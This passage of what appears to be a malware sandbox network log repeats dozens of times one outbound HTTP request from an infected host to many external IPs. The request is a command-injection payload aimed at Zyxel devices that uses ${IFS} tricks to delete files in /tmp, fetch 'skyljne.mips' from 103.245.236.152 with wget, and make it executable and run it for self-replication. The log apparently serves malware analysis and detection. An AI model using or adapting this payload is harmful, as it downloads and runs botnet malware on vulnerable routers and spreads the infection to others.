                                          Jan 14, 2024 15:46:17.011820078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4516192.168.2.234352419.80.65.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011846066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4517192.168.2.235515287.220.164.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011863947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4518192.168.2.2343094155.133.218.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011912107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4519192.168.2.2339522170.79.98.112443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011935949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4520192.168.2.2345972208.236.27.152443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011965990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4521192.168.2.235799483.17.33.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.011974096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4522192.168.2.2349944100.157.62.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012003899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4523192.168.2.235822048.238.43.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012058973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4524192.168.2.2352184222.17.226.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012063980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4525192.168.2.2352428172.51.138.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012108088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4526192.168.2.235876493.31.67.88443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012115002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4527192.168.2.2343314165.157.1.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012146950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4528192.168.2.235330662.246.56.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012154102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4529192.168.2.2339044155.186.153.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012171984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4530192.168.2.235067066.75.61.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012224913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4531192.168.2.2355228169.209.217.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012254000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4532192.168.2.2338124154.193.70.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012262106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4533192.168.2.2360192155.187.118.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012291908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4534192.168.2.2338962119.38.39.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012321949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4535192.168.2.2350530194.179.91.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012355089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4536192.168.2.234783699.248.212.27443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012372017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4537192.168.2.2340064198.148.117.140443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012413979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4538192.168.2.2337034212.139.100.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012466908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4539192.168.2.234593447.189.178.114443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012475967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4540192.168.2.234816864.214.146.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012500048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4541192.168.2.2358224196.234.51.155443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012547016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4542192.168.2.2338076150.168.156.80443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012572050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4543192.168.2.234985234.183.111.82443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012577057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4544192.168.2.2348832102.47.55.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012595892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4545192.168.2.23364669.25.217.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012625933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4546192.168.2.233639478.201.248.49443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012656927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4547192.168.2.235818465.114.146.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012695074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4548192.168.2.2351086220.90.66.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012696981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4549192.168.2.2338708159.175.50.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012753963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4550192.168.2.236018486.18.238.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012778997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4551192.168.2.233695634.153.212.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012819052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4552192.168.2.2346712211.207.56.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012840033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4553192.168.2.2349328134.117.167.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012861967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4554192.168.2.2335960119.160.228.122443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012871027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4555192.168.2.2342344190.156.71.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012892962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4556192.168.2.2347386126.238.2.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012955904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4557192.168.2.2352454104.42.169.177443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012962103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4558192.168.2.2336718121.188.252.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.012991905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4559192.168.2.235720048.156.80.220443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013036966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4560192.168.2.2348214119.247.114.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013041019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4561192.168.2.2358810144.104.229.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013072014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4562192.168.2.23357005.143.14.103443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013102055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4563192.168.2.234610671.191.41.19443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013123035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4564192.168.2.234513238.90.212.218443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013160944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4565192.168.2.2359608139.156.236.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013201952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4566192.168.2.2345750176.115.0.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013223886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4567192.168.2.23374644.67.64.229443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013259888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4568192.168.2.234823687.49.230.248443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013314009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4569192.168.2.2360288132.90.157.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013314962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4570192.168.2.2334652202.170.18.252443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013314962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4571192.168.2.2344228149.79.36.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013391018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4572192.168.2.2351266188.134.108.76443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013394117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4573192.168.2.235453436.40.58.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013433933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4574192.168.2.2349426177.22.136.181443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013467073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4575192.168.2.2355454102.39.221.145443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013484955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4576192.168.2.2356308134.137.248.208443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013504028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4577192.168.2.235505819.230.230.95443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:17.013530970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          4578192.168.2.234169678.229.191.43443
                                          TimestampBytes transferredDirectionData
